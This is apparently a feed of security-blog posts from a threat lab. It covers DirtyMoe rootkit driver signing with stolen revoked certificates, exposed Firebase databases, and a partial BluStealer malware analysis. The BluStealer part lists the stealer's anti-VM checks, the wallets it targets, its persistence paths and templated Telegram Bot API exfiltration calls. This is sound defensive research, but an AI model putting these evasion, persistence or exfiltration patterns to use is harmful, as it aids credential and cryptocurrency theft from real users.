[1] Kernel-Mode Driver Architecture
[2] Driver to Hide Processes and Files
[3] A piece of code to hide registry entries
[4] Hidden
[5] Opening Hacker’s Door
[6] Hiding loaded driver with DKOM
[7] Crashdmp-ster Diving the Windows 8 Crash Dump Stack
[8] Ghost drivers named dump_*.sys
[9] Driver Signing
[10] Australian web hosts hit with a Manic Menagerie of malware

Appendix A

Registry entries used in the Start Routine


Appendix B

Example of registry entries configuring the driver

Key: ControlSet001\Control\WinApi
Value: WinDeviceAddress
Data: Ms312B9050App;   

Value: WinDeviceNumber

Value: WinDeviceName

Value: WinDeviceId
Data: dump_FDC.sys;

The post DirtyMoe: Rootkit Driver appeared first on Avast Threat Labs.

Research shows over 10% of sampled Firebase instances open

1 September 2021 at 13:46

Firebase is Google’s mobile and web app development platform. Developers can use Firebase to facilitate developing mobile and web apps, especially for the Android mobile platform.

At the end of July 2021 we did research into open Firebase instances.

In that research, we found about 180,300 Firebase addresses in our systems and found approximately 19,300 of those Firebase DBs, 10.7% of the tested DBs were open, exposing the data to unauthenticated users, due to misconfiguration by the app developers. This is quite a large percentage.

These addresses were statically and dynamically extracted from different sources, mainly from Android apps.

We took these Firebase addresses and examined them to see how many were open. In our testing, we looked only for instances that were open for “Read” access without credentials. We didn’t test for write access for obvious reasons.

These open Firebase instances put the data stored and used by the apps developed using it at risk of theft, because apps can store and use a variety of information, some of it including personally identifiable information (PII) like names, birthdates, addresses, phone numbers, location information, service tokens and keys among other things. When developers use bad practices DBs can even contain plaintext passwords. This means that potentially the personal information of over 10% of users of Firebase-based apps can be at risk.

An example of “leaking” instance

Of course, our testing shows only a subset of all existing Firebase instances. However, we believe that this 10.7% number can be a reasonable representative sample of the total number of Firebase instances that are currently open.

We took our findings to Google and asked them to inform developers of the apps we identified as open as well as contacting some of the developers ourselves.. Google has several features to improve data protection in Firebase, including notifications and regular emails about potential misconfigurations.

While we appreciate Google’s actions based on our findings, we also believe it’s important to inform Firebase developers about potential risk of misconfigured DBs and follow the best practices that Google has provided at This also once again underscores the importance of making security and privacy a key part of the entire app development process, not just as a later “bolt on”.

Most importantly, we want to urge  all developers to check their databases and other storage for possible misconfigurations to protect users’ data and make our digital world safer.

The post Research shows over 10% of sampled Firebase instances open appeared first on Avast Threat Labs.

DirtyMoe: Code Signing Certificate

17 September 2021 at 12:05


The DirtyMoe malware uses a driver signed with a revoked certificate that can be seamlessly loaded into the Windows kernel. Therefore, one of the goals is to analyze how Windows works with a code signature of Windows drivers. Similarly, we will be also interested in the code signature verification of user-mode applications since the user account control (UAC) does not block the application execution even if this one is also signed with a revoked certificate. The second goal is a statistical analysis of certificates that sign the DirtyMoe driver because the certificates are also used to sign other malicious software. We focus on the determination of the certificate’s origin, prevalence, and a quick analysis of the top 10 software signed with these certificates.

Contrary to what often has been assumed, Windows loads a driver signed with a revoked certificate. Moreover, the results indicate that the UAC does not verify revocation online but only via the system local storage which is updated by a user manually. DirtyMoe certificates are used to sign many other software, and the number of incidents is still growing. Furthermore, Taiwan and Russia seem to be the most affected by these faux signatures.

Overall, the analyzed certificates can be declared as malicious, and they should be monitored. The UAC contains a significant vulnerability in its code signature verification routine. Therefore, in addition to the usual avoidance of downloading from usual sources, Windows users should also not fully rely on inbuilt protections only. Due to the flawed certificate verification, manual verification of the certificate is recommended for executables requiring elevated privileges.

1. Introduction

The DirtyMoe malware is a complex malicious backdoor designed to be modularized, undetectable, and untrackable. The main aim of DirtyMoe is cryptojacking and DDoS attacks. Basically, it can do anything that attackers want. The previous study, published at DirtyMoe: Introduction and General Overview, has shown that DirtyMoe also employs various self-protection and anti-forensics mechanisms. One of the more significant safeguards, defending DirtyMoe, is a rootkit. What is significant about the rootkit using is that it offers advanced techniques to hide malicious activity on the kernel layer. Since DirtyMoe is complex malware and has undergone long-term development, therefore, the malware authors have also implemented various rootkit mechanisms. The DirtyMoe: Rootkit Driver post examines the DirtyMoe driver functionality in detail.

However, another important aspect of the rootkit driver is a digital signature. The rootkits generally exploit the system using a Windows driver. Microsoft has begun requiring the code signing with certificates that a driver vendor is trusted and verified by a certification authority (CA) that Microsoft trusts. Nonetheless, Windows does not allow the loading of unsigned drivers since 64-bit Windows Vista and later versions. Although the principle of the code signing is correct and safe, Windows allows  loading a driver that a certificate issuer has explicitly revoked the used certificate. The reasons for this behavior are various, whether in terms of performance or backward compatibility. The weak point of this certificate management is if malware authors steal any certificate that has been verified by Microsoft and revoked by CA in the past. Then the malware authors can use this certificate for malicious purposes. It is precisely the case of DirtyMoe, which still signs its driver with stolen certificates. Moreover, users cannot affect the codesign verification via the user account control (UAC) since drivers are loaded in the kernel mode.

Motivated by the loading of drivers with revoked certificates, the main issues addressed in this paper are analysis of mechanism how Windows operates with code signature in the kernel and user mode; and detailed analysis of certificates used for code signing of the DirtyMoe driver.

This paper first gives a brief overview of UAC and code signing of Windows drivers. There are also several observations about the principle of UAC, and how Windows manages the certificate revocation list (CRL). The remaining part of the paper aims to review in detail the available information about certificates that have been used to code signatures of the DirtyMoe driver.

Thus far, three different certificates have been discovered and confirmed by our research group as malicious. Drivers signed with these certificates can be loaded notwithstanding their revocation into the 64-bit Windows kernel. An initial objective of the last part is an analysis of the suspicious certificates from a statistical point of view. There are three viewpoints that we studied. The first one is the geological origin of captured samples signed with the malicious certificate. The second aspect is the number of captured samples, including a prediction factor for each certificate. The last selected frame of reference is a statistical overview about a type of the signed software because the malware authors use the certificates to sign various software, e.g., cracked software or other popular user applications that have been patched with a malicious payload. We have selected the top 10 software signed with revoked certificates and performed a quick analysis. Categories of this software help us to ascertain the primarily targeted type of software that malware authors signed. Another significant scope of this research is looking for information about companies that certificates have probably been leaked or stolen.

2. Background

Digital signatures are able to provide evidence of the identity, origin, and status of electronic documents, including software. The user can verify the validity of signatures with the certification authority. Software developers use digital signatures to a code signing of their products. The software authors guarantee via the signature that executables or scripts have not been corrupted or altered since the products have been digitally signed. Software users can verify the credibility of software developers before run or installation.

Each code-signed software provides information about its issuer, and an URL points to the current certificate revocation list (CRL) known as the CRL Distribution Point. Windows can follow the URL and check the validity of the used certificate. If the verification fails, the User Account Control (UAC) blocks software execution that code-signature is not valid. Equally important is the code-signature of Windows drivers that use a different approach to digital signature verification. Whereas user-mode software signatures are optional, the Windows driver must be signed by a CA that Windows trusts. Driver signing is mandatory since 64-bit Windows Vista.

2.1 User Account Control and Digital Signature

Windows 10 prompts the user for confirmation if the user wants to run software with high permission. User Account Control (UAC) should help to prevent users from inadvertently running malicious software or other types of changes that might destabilize the Windows system. Additionally, UAC uses color coding for different scenarios – blue for a verified signature, yellow for an unverified, and red for a rejected certificate; see Figure 1.

Figure 1: UAC of verified, unverified, and rejected software requiring the highest privileges

Unfortunately, users are the weakest link in the safety chain and often willingly choose to ignore such warnings. Windows itself does not provide 100% protection against unknown publishers and even revoked certificates. So, user’s ignorance and inattention assist malware authors.

2.2 Windows Drivers and Digital Signature

Certificate policy is diametrically different for Windows drivers in comparison to other user-mode software. While user-mode software does not require code signing, code signing is mandatory for a Windows driver; moreover, a certificate authority trusted by Microsoft must be used. Nonetheless, the certificate policy for the windows drivers is quite complicated as MSDN demonstrates [1].

2.2.1 Driver Signing

Historically, 32-bit drivers of all types were unsigned, e.g., drivers for printers, scanners, and other specific hardware. Windows Vista has brought a new signature policy, but Microsoft could not stop supporting the legacy drivers due to backward compatibility. However, 64-bit Windows Vista and later has to require digitally signed drivers according to the new policy. Hence, 32-bit drivers do not have to be signed since these drivers cannot be loaded into the 64-bit kernels. The code signing of 32-bit drivers is a good practice although the certificate policy does not require it.

Microsoft has no capacity to sign each driver, more precisely file, provided by third-party vendors. Therefore, a cross-certificate policy is used to provide an instrument to create a chain of trust. This policy allows the release of a subordinate certificate that builds the chain of trust from the Microsoft root certification authority to multiple other CAs that Microsoft accredited. The current cross-certificate list is documented in [2]. In fact, the final driver signature is done with a certificate that has been issued by the subordinate CA, which Microsoft authorized.

The examples of the certificate chain illustrates Figure 2 and the following output of signtool;
see Figure 3.

Figure 2: Certification chain of one Avast driver
Figure 3: Output of signtool.exe for one Avast driver
2.2.2 Driver Signature Verification

For user-mode software, digital signatures are verified remotely via the CRL list obtained from certificate issuers. The signature verification of Windows drivers cannot be performed online compared with user-mode software because of the absence of network connection during the kernel bootup. Moreover, the kernel boot must be fast and a reasonable approach to tackle the signature verification is to implement a light version of the verification algorithm.

The Windows system has hardcoded root certificates of several CAs and therefore can verify the signing certificate chain offline. However, the kernel has no chance to authenticate signatures against CRLs. The same is applied to expired certificates. Taken together, this approach is implemented due to kernel performance and backward driver compatibility. Thus, leaked and compromised certificates of a trusted driver vendor causes a severe problem for Windows security.

3. CRL, UAC, and Drivers

As was pointed out in the previous section, CRL contains a list of revoked certificates. UAC should verify the chain of trust of run software that requires higher permission. The UAC dialog then shows the status of the certificate verification. It can end with two statuses, e.g., verified publisher or unknown publisher [3], see Figure 1.

However, we have a scenario where software is signed with a revoked certificate and run is not blocked by UAC. Moreover, the code signature is marked as the unknown publisher (yellow titled UAC), although the certificate is in CRL.

3.1 Cryptographic Services and CRL Storage

Cryptographic Services confirms the signatures of Windows files and stores file information into the C:\Users\<user>\AppData\LocalLow\Microsoft\CryptnetUrlCache folder, including the CRL of the verified file. The CryptnetUrlCache folder (cache) is updated, for instance, if users manually check digital signatures via “Properties -> Digital Signature” or via the signtool tools, as Figure 3 and Figure 4 illustrate. The certificate verification processes the whole chain of trust, including CRL and possible revocations deposits in the cache folder.

Figure 4: List of digital signature via Explorer

Another storage of CRLs is Certificate Storage accessible via the Certificate Manager Tool; see
Figure 5. This storage can be managed by local admin or domain.

Figure 5: Certificate Manager Tool
3.2 CRL Verification by UAC

UAC itself does not verify code signature, or more precisely chain of trust, online; it is probably because of system performance. The UAC codesign verification checks the signature and CRL via CryptnetUrlCache and the system Certificate storage. Therefore, UAC marks malicious software, signed with the revoked certificate, as the unknown publisher because CryptnetUrlCache is not up-to-date initially.

Suppose the user adds appropriate CRL into Certificate Storage manually using this command:
certutil -addstore -f Root CSC3-2010.crl

In that case, UAC will successfully detect the software as suspicious, and UAC displays this message: “An administrator has blocked you from running this app.” without assistance from Cryptographic Services and therefore offline.

The Windows update does not include CRLs of cross-certificate authorities that Microsoft authorized to codesign of Windows files. This fact has been verified via Windows updates and version as follow:

  • Windows Malicious Software Removal Tool x64 – v5.91 (KB890830)
  • 2021-06 Cumulative update for Windows 10 Version 20H2 for x64-based System (KB5003690)
  • Windows version: 21H1 (OB Build 19043.1110)

In summary, UAC checks digital signatures via the system local storage of CRL and does not verify code signature online.

3.3 Windows Driver and CRL

Returning briefly to the codesign of the Windows driver that is required by the kernel. The kernel can verify the signature offline, but it cannot check CRL since Cryptographic Services and network access are not available at boot time.

Turning now to the experimental evidence on the offline CRL verification of drivers. It is evident in the case described in Section 3.2 that UAC can verify CRL offline. So, the tested hypothesis is that the Windows kernel could verify the CRL of a loaded driver offline if an appropriate CRL is stored in Certificate Storage. We used the DirtyMoe malware to deploy the malicious driver that is signed with the revocated certificate. The corresponding CRL of the revoked certificate has been imported into Certificate Storage. However, the driver was still active after the system restart. It indicates that the rootkit was successfully loaded into the kernel, although the driver certificate has been revoked and the current CRL was imported into Certificate Storage. There is a high probability that the kernel avoids the CRL verification even from local storage.

4. Certificate Analysis

The scope of this research are three certificates as follow:

Beijing Kate Zhanhong Technology Co.,Ltd.
Valid From: 28-Nov-2013 (2:00:00)
Valid To: 29-Nov-2014 (1:59:59)
SN: 3c5883bd1dbcd582ad41c8778e4f56d9
Thumbprint: 02a8dc8b4aead80e77b333d61e35b40fbbb010a0
Revocation Status: Revoked on 22-May-‎2014 (9:28:59)
CRL Distribution Point:

Beijing Founder Apabi Technology Limited
Valid From: 22-May-2018 (2:00:00)
Valid To: 29-May-2019 (14:00:00)
SN: 06b7aa2c37c0876ccb0378d895d71041
Thumbprint: 8564928aa4fbc4bbecf65b402503b2be3dc60d4d
Revocation Status: Revoked on 22-May-‎2018 (2:00:01)
CRL Distribution Point:

Shanghai Yulian Software Technology Co., Ltd. (上海域联软件技术有限公司)
Valid From: 23-Mar-2011 (2:00:00)
Valid To: 23-Mar-2012 (1:59:59)
SN: 5f78149eb4f75eb17404a8143aaeaed7
Thumbprint: 31e5380e1e0e1dd841f0c1741b38556b252e6231
Revocation Status: Revoked on 18-Apr-‎2011 (10:42:04)
CRL Distribution Point:

4.1 Beijing Kate Zhanhong Technology Co.,Ltd.

We did not find any relevant information about Beijing Kate Zhanhong Technology company. Avast captured 124 hits signed with the Beijing Kate certificates from 2015 to 2021. However, prediction to 2021 indicates a downward trend; see Figure 6. Only 19 hits have been captured in the first 7 months of this year, so the prediction for this year (2021) is approx. 30 hits signed with this certificate.

Figure 6: Number of hits and prediction of Beijing Kate

Ninety-five percent of total hits have been located in Asia; see Table 1 for detailed GeoIP distribution of the last significant years.

Year / Country CN TW UA MY KR HK
2015 15 1 3
2018 3 1 2
2019 19 2
2020 12 46 1
2021 11 8
Total 60 48 3 3 8 2
Table 1: Geological distribution of Beijing Kate certificates

The malware authors use this certificate to sign Windows system drivers in 61 % of monitored hits, and Windows executables are signed in 16 % of occurrences. Overall, it seems that the malware authors focus on Windows drivers, which must be signed with any verified certificates.

4.2 Beijing Founder Apabi Technology Limited

The Beijing Founder Apabi Technology Co., Ltd. was founded in 2001, and it is a professional digital publishing technology and service provider under Peking University Founder Credit Group. The company also develops software for e-book reading like Apabi Reader‬ [4].

The Beijing Founder certificate has been observed, as malicious, in 166 hits with 18 unique SHAs. The most represented sample is an executable called “Linking.exe” which was hit in 8 countries, most in China; exactly 71 cases. The first occurrence and peak of the hits were observed in 2018. The incidence of hits was an order of magnitude lower in the previous few years, and we predict an increase in the order of tens of hits, as Figure 7 illustrates.

Figure 7: Number of hits and prediction of Beijing Founder
4.3 Shanghai Yulian Software Technology Co., Ltd.

The Shanghai Yulian Software Technology Co. was founded in 2005, which provides network security guarantees for network operators. Its portfolio covers services in the information security field, namely e-commerce, enterprise information security, security services, and system integration [5].

The Shanghai Yulian Software certificate is the most widespread compared to others. Avast captured this certificate in 10,500 cases in the last eight years. Moreover, the prevalence of samples signed with this certificate is on the rise, although the certificate was revoked by its issuer in 2011. In addition, the occurrence peak was in 2017 and 2020. We assume a linear increase of the incidence and a prediction for 2021 is based on the first months of 2021. And therefore, the prediction for 2021 indicates that this revoked certificate will also dominate in 2021; see the trend in Figure 8. We have no record of what caused the significant decline in 2018 and 2019.

Figure 8: Number of hits and prediction of Shanghai Yulian Software

The previous certificates dominate only in Asia, but the Shanghai Yulian Software certificate prevails in Asia and Europe, as Figure 9 illustrates. The dominant countries are Taiwan and Russia. China and Thailand are on a close hinge; see Table 2 for detailed country distribution, several countries selected.

Figure 9: Distribution of hits in point of continent view for Shanghai Yulian Software
Year / Country TW RU CN TH UA BR EG HK IN CZ
2016 6 18 2
2017 925 28 57 4 1
2018 265 31 79 4 3 26 4 1 2
2019 180 54 56 10 9 98 162 5 45 1
2020 131 1355 431 278 232 112 17 168 86 24
Total 1507 1468 641 292 244 242 183 174 131 28
Table 2: Geological distribution of Shanghai Yulian Software certificate

As in previous cases, the malware authors have been using Shanghai Yulian Software certificates to sign Windows drivers in 75 % of hits. Another 16 % has been used for EXE and DLL executable; see Figure 10 for detailed distribution.

Figure 10: Distribution of file types for Shanghai Yulian Software
4.3.1 Analysis of Top 10 Captured Files

We summarize the most frequent files in this subchapter. Table 3 shows the occurrence of the top 10 executables that are related to user applications. We do not focus on DirtyMoe drivers because this topic is recorded at DirtyMoe: Rootkit Driver.

Hit File Name Number of Hits Hit File Name Number of Countries
WFP_Drive.sys 1056 Denuvo64.sys 81
LoginDrvS.sys 1046 WsAP-Filmora.dll 73
Denuvo64.sys 718 SlipDrv7.sys 20
WsAP-Filmora.dll 703 uTorrent.exe 47
uTorrent.exe 417 RTDriver.sys 41
SlipDrv7.sys 323 SlipDrv10.sys 42
LoginNpDriveX64.sys 271 SbieDrv.sys 22
RTDriver.sys 251 SlipDrv81.sys 16
SlipDrv10.sys 238 ONETAP V4.EXE 16
SbieDrv.sys 189 ECDM.sys 13
Table 3: The most common occurrence of the file names: hit count and number of countries

We have identified the five most executables signed with Shanghai Yulian Software certificate. The malware authors target popular and commonly used user applications such as video editors, communication applications, and video games.

1) WFP_Drive.sys

The WFP driver was hit in a folder of App-V (Application Virtualization) in C:\ProgramData. The driver can filter network traffic similar to a firewall [6]. So, malware can block and monitor arbitrary connections, including transferred data. The malware does not need special rights to write into the ProgramData folder. The driver and App-V’s file names are not suspicious at first glance since App-V uses Hyper-V Virtual Switch based on the WFP platform [7].

Naturally, the driver has to be loaded with a process with administrator permission. Subsequently, the process must apply for a specific privilege called SeLoadDriverPrivilege (load and unload device drivers) to successful driver loading. The process requests the privilege via API call EnablePriviliges that can be monitored with AVs. Unfortunately, Windows loads drivers with revoked certificates, so the whole security mechanism is inherently flawed.

2) LoginDrvS.sys

Further, the LoginDrvS driver uses a similar principle as the WFP driver. The malware camouflages its driver in a commonly used application folder. It uses the LineageLogin application folder that is used as a launcher for various applications, predominantly video games. LineageLogin is implemented in Pascal [8]. The LineageLogin itself contains a suspicious embedded DLL. However, it is out of this topic. Both drivers (WFP_Drive.sys and LoginDrvS.sys) are presumably from the same malware author as their PDB paths indicate:

  • f:\projects\c++\win7pgkill\amd64\LoginDrvS.pdb (10 unique samples)
  • f:\projects\c++\wfp\objfre_win7_amd64\amd64\WFP_Drive.pdb (8 unique samples)

Similar behavior is described in Trojan.MulDrop16.18994, see [9].

3) Denuvo64.sys

Denuvo is an anti-piracy protection technique used by hundreds of programming companies around the world [10]. This solution is a legal rootkit that can also detect cheat mode and other unwanted activity. Therefore, Denuvo has to use a kernel driver.

The easy way to deploy a malicious driver is via cracks that users still download abundantly. The malware author packs up the malicious driver into the cracks, and users prepare a rootkit backdoor within each crack run. The malicious driver performs the function that users expect, e.g., anti-anti cheating or patching of executable, but it also services a backdoor very often.

We have revealed 8 unique samples of Denuvo malicious drivers within 1046 cases. The most occurrence is in Russia; see Figure 11. The most hits are related to video game cracks as follows: Constructor, Injustice 2, Prey, Puyo Puyo Tetris, TEKKEN 7 – Ultimate Edition, Total War – Warhammer 2, Total.War – Saga Thrones of Britannia.

Figure 11: Distribution of Denuvo driver across the countries

4) WsAP-Filmora.dll

Wondershare Filmora is a simple video editor which has free and paid versions [11]. So, there is a place for cracks and malware activities. All hit paths point to crack activity where users tried to bypass the trial version of the Filmora editor. No PDB path has been captured; therefore, we cannot determine the malware authors given other samples signed with the same certificates. WsAP-Filmora.dll is widespread throughout the world (73 countries); see the detailed country distribution in Figure 12.

Figure 12: Filmora DLL distribution across the countries

5) μTorrent.exe

μTorrent is a freeware P2P client for the BitTorrent network [12]. Avast has detected 417 hits of malicious μTorrent applications. The malicious application is based on the original μTorrent client with the same functionality, GUI, and icon. If a user downloads and runs this updated μTorrent client, the application’s behavior and design are not suspicious for the user.

The original application is signed with Bit Torrent, Inc. certificate, and the malicious version was signed with Shanghai Yulian Software certificate. Everyday users, who want to check the digital signature, see that the executable is signed. However, information about the signature’s suspiciousness is located in details that are not visible at first glance, Figure 13.

Figure 13: Digital signatures of original and malicious μTorrent client

The malicious signature contains Chinese characters, although the sample’s prevalence points to Russia. Moreover, China has no hits. Figure 14 illustrates a detailed country distribution of the malicious μTorrent application.

Figure 14: Distribution of μTorrent client across the countries
4.3.2 YDArk Rootkit

We have found one Github repository which contains a YDArk tool that monitors system activities via a driver signed with the compromised certificate. The last sign was done in May 2021; hence it seems that the stolen certificate is still in use despite the fact that it was revoked 10 years ago. The repository is managed by two users, both located in China. The YDArk driver has been signed with the compromise certificates by ScriptBoy2077, who admitted that the certificate is compromised and expired by this note:

I have signed the .sys file with a compromised, expired certificate, may it is helpful to those my friends who don’t know how to load an unsigned driver.

The private key of the compromised certificate is not available on the clearnet. We looked for by the certificate name, serial number, hashes, etc.; hence we can assume that the certificate and private key can be located in the darknet and shared within a narrow group of malware authors. Consequently, the relationship between YDArk, more precisely ScriptBoy2077, and the DirtyMoe driver is compelling. Additionally, C&C DirtyMoe servers are also located in most cases in China, as we described in DirtyMoe: Introduction and General Overview.

5. Discussion

The most interesting finding of this research was that Windows allows loading drivers signed with revoked certificates even if an appropriate CRL is locally stored. Windows successfully verifies the signature revocation offline for user-mode applications via UAC. However, if Windows loads drivers with the revoked certificate into the kernel despite the up-to-date CRL, it is evident that the Windows kernel avoids the CRL check. Therefore, it is likely that the missing implementation of CRL verification is omitted due to the performance at boot time. It is a hypothesis, so further research will need to be undertaken to fully understand the process and implementation of driver loading and CRL verification.

Another important finding was that the online CRL is not queried by UAC in digital signatures verification for user-mode applications, which require higher permission. It is somewhat surprising that UAC blocks the applications only if the user manually checks the chain of trust before the application is run; in other words, if the current CRL is downloaded and is up-to-date before the UAC run. So, the evidence suggests that neither UAC does not fully protect users against malicious software that has been signed with revoked certificates. Consequently, the users should be careful when UAC appears. 

The DirtyMoe’s driver has been signing with three certificates that we analyzed in this research. Evidence suggests that DirtyMoe’s certificates are used for the code signing of other potentially malicious software. It is hard to determine how many malware authors use the revoked certificates precisely. We classified a few clusters of unique SHA samples that point to the same malware authors via PDB paths. However, many other groups cannot be unequivocally identified. There is a probability that the malware authors who use the revoked certificates may be a narrow group; however, further work which compares the code similarities of signed software is required to confirm this assumption. This hypothesis is supported by the fact that samples are dominantly concentrated in Taiwan and Russia in such a long time horizon. Moreover, leaked private keys are often available on the internet, but the revoked certificates have no record. It could mean that the private keys are passed on within a particular malware author community.

According to these data, we can infer that the Shanghai Yulian Software Technology certificate is the most common use in the wild and is on the rise, although the certificate was revoked 10 years ago. Geological data demonstrates that the malware authors target the Asian and European continents primarily, but the reason for this is not apparent; therefore, questions still remain. Regarding types of misused software, the analysis of samples signed with the Shanghai Yulian Software certificate confirmed that most samples are rootkits deployed together with cracked or patched software. Other types of misused software are popular user applications, such as video games, communication software, video editors, etc. One of the issues is that the users observe the correct behavior of suspicious software, but malicious mechanisms or backdoors are also deployed.

In summary, the DirtyMoe’s certificates are still used for code signing of other software than the DirtyMoe malware, although the certificates were revoked many years ago.

6. Conclusion

The malware analysis of the DirtyMoe driver (rootkit) discovered three certificates used for codesign of suspicious executables. The certificates have been revoked in the middle of their validity period. However, the certificates are still widely used for codesign of other malicious software.

The revoked certificates are principally misused for the code signature of malicious Windows drivers (rootkits) because the 64bit Windows system has begun requiring the driver signatures for greater security. On the other hand, Windows does not implement the verification of signatures via CRL. In addition, the malware authors abuse the certificates to sign popular software to increase credibility, whereas the software is patched with malicious payloads. Another essential point is that UAC verifies the signatures against the local CRL, which may not be up-to-date. UAC does not download the current version of CRL when users want to run software with the highest permission. Consequently, it can be a serious weakness.

One source of uncertainty is the origin of the malware authors who misused the revoked certificates. Everything points to a narrow group of the author primarily located in China. Further investigation of signed samples are needed to confirm that the samples contain payloads with similar functionality or code similarities.

Overall, these results and statistics suggest that Windows users are still careless when running programs downloaded from strange sources, including various cracks and keygens. Moreover, Windows has a weak and ineffective mechanism that would strongly warn users that they try to run software with revoked certificates, although there are techniques to verify the validity of digital signatures.


[1] Driver Signing
[2] Cross-Certificates for Kernel Mode Code Signing
[3] How Windows Handles Running Files Whose Publisher’s Certificate(s) Have Been Revoked
[4] Beijing Founder Apabi Technology Limited
[5] Shanghai Yulian Software Technology Co., Ltd.
[6] WFP network monitoring driver (firewall)
[7] Hyper-V Virtual Switch
[8] Lineage Login
[9] Dr. Web: Trojan.MulDrop16.18994
[10] Denuvo
[11] Filmora
[12] μTorrent

The post DirtyMoe: Code Signing Certificate appeared first on Avast Threat Labs.

BluStealer: from SpyEx to ThunderFox

By: Anh Ho
20 September 2021 at 17:06


BluStealer is is a crypto stealer, keylogger, and document uploader written in Visual Basic that loads C#.NET hack tools to steal credentials. The family was first mentioned by @James_inthe_box in May and referred to as a310logger. In fact, a310logger is just one of the namespaces within the .NET component that appeared in the string artifacts. Around July, Fortinet referred to the same family as a “fresh malware”, and recently it is mentioned again as BluStealer by GoSecure. In this blog, we decide to go with the BluStealer naming while providing a fuller view of the family along with details of its inner workings.

a310logger is just one of the multiple C# hack tools in BluStealer’s .NET component.

BluStealer is primarily spread through malspam campaigns. A large number of the samples we found come from a particular campaign that is recognizable through the use of a unique .NET loader. The analysis of this loader is provided in this section. Below are two BluStealer malspam samples. The first is a fake DHL invoice in English. The second is a fake General de Perfiles message, a Mexican metal company, in Spanish. Both samples contain .iso attachments and download URLs that the messages claim is a form that the lure claims the recipient needs to open and fill out to resolve a problem. The attachments contain the malware executables packed with the mentioned .NET Loader.

In the graph below, we can see a significant spike in BluStealer activity recently around September 10-11, 2021.

The daily amount of Avast users protected from BluStealer

BluStealer Analysis

As mentioned, BluStealer consists of a core written in Visual Basic and the C# .NET inner payload(s). Both components vary greatly among the samples indicating the malware builder’s ability to customize each component separately. The VB core reuses a large amount of code from a 2004 SpyEx project, hence the inclusion of “SpyEx” strings in early samples from May. However, the malware authors have added the capabilities to steal crypto wallet data, swap crypto addresses present in the clipboard, find and upload document files, exfiltrate data through SMTP and the Telegram Bot API, as well as anti-analysis/anti-VM tactics. On the other hand, the .NET component is primarily a credential stealer that is patched together from a combination of open-source C# hack tools such as ThunderFox, ChromeRecovery, StormKitty, and firepwd. Note that not all the mentioned features are available in a single sample.


Example of how the strings are decrypted within BluStealer

Each string is encrypted with a unique key. Depending on the sample, the encryption algorithm can be the xor cipher, RC4, or the WinZip AES implementation from this repo. Below is a Python demonstration of the custom AES algorithm:

 A utility to help decrypt all strings in IDA is available here.

Anti-VM Tactics

BluStealer checks the following conditions:

If property Model of  Win32_ComputerSystem WMI class contains:

VIRTUA (without L), VMware Virtual Platform, VirtualBox, microsoft corporation, vmware, VMware, vmw

If property SerialNumber of Win32_BaseBoard WMI class contains  0 or None

If the following files exist:

  • C:\\Windows\\System32\\drivers\\vmhgfs.sys
  • C:\\Windows\\System32\\drivers\\vmmemctl.sys
  • C:\\Windows\\System32\\drivers\\vmmouse.sys
  • C:\\Windows\\System32\\drivers\\vmrawdsk.sys
  • C:\\Windows\\System32\\drivers\\VBoxGuest\.sys
  • C:\\Windows\\System32\\drivers\\VBoxMouse.sys
  • C:\\Windows\\System32\\drivers\\VBoxSF.sys
  • C:\\Windows\\System32\\drivers\\VBoxVideo.sys

If any of these conditions are satisfied, BluStealer will stop executing.

.NET Component

The BluStealer retrieves the .NET payload(s) from the resource section and decrypts it with the above WinZip AES algorithm using a hardcoded key. Then it executes one of the following command-line utilities to launch the .NET executable(s):

  • C:\Windows\Microsoft.NET\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe
  • C:\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe
Examples of two .NET executables loaded by the VB core. The stolen credentials are written to “credentials.txt”

The .NET component does not communicate with the VB core in any way. It steals the credentials of popular browsers and applications then writes them to disk at a chosen location with a designated filename (i.e credentials.txt). The VB core will look for this drop and exfiltrate it later on. This mechanic is better explained in the next section.

The .NET component is just a copypasta of open-source C# projects listed below. You can find more information on their respective Github pages:

  • ThunderFox:
  • ChromeRecovery:
  • StormKitty:

Information Stealer

Both the VB core and the .NET component write stolen information to the %appdata%\Microsoft\Templates folder. Each type of stolen data is written to a different file with predefined filenames. The VB core sets up different timers to watch over each file and keeps track of their file sizes. When the file size increases, the VB core will send it to the attacker.

Handler Arbitrary filename Stolen Information Arbitrary Timers(s)
.NET component credentials.txt Credentials stored in popular web browsers and applications, and system profiling info 80
.NET component Cookies stored in Firefox and Chrome browsers 60
VB Core Database files that often contain private keys of the following crypto wallet:  ArmoryDB, Bytecoin, Jaxx Liberty, Exodus, Electrum, Atomic, Guarda, Coinomi 50
VB Core FilesGrabber\\ Document files (.txt, .rtf, .xlxs, .doc(x), .pdf, .utc) less than 2.5MB 30
VB Core Others Screenshot, Keylogger, Clipboard data 1 or None

BluStealer VB core also detects the crypto addresses copied to the clipboard and replaces them with the attacker’s predefined ones. Collectively it can support the following addresses: Bitcoin, bitcoincash, Ethereum, Monero, Litecoin.

Data Exfiltration

BluStealer exfiltrates stolen data via SMTP (reusing SpyEx’s code) and Telegram Bot, hence the lack of server-side code. The Telegram token and chat_id are hardcoded to execute the 2 commands: sendDocument and sendMessage as shown below

  •[BOT TOKEN]/sendMessage?chat_id=[MY_CHANNEL_ID]&text=[MY_MESSAGE_TEXT]
  •[BOT TOKEN]/sendDocument?chat_id=[MY_CHANNEL_ID]&caption=[MY_CAPTION]

The SMTP traffic is constructed using Microsoft MimeOLE specifications

Example of SMTP content

.NET Loader Walkthrough

This .NET Loader has been used by families such as Formbook, Agent Tesla, Snake Keylogger, Oski Stealer, RedLine, as well as BluStealer.

Demo sample: 19595e11dbccfbfeb9560e36e623f35ab78bb7b3ce412e14b9e52d316fbc7acc

First Stage

The first stage of the .NET loader has a generic obfuscated look and isn’t matched by de4dot to any known .NET obfuscator. However, one recognizable characteristic is the inclusion of a single encrypted module in the resource:

By looking for this module’s reference within the code, we can quickly locate where it is decrypted and loaded into memory as shown below

Prior to loading the next stage, the loader may check for internet connectivity or set up persistence through the Startup folder and registry run keys. A few examples are:

  • C:\Users\*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\chrome\chrom.exe
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\chrom
  • C:\Users\*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\paint\paint.exe
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\paint
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Startup
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup
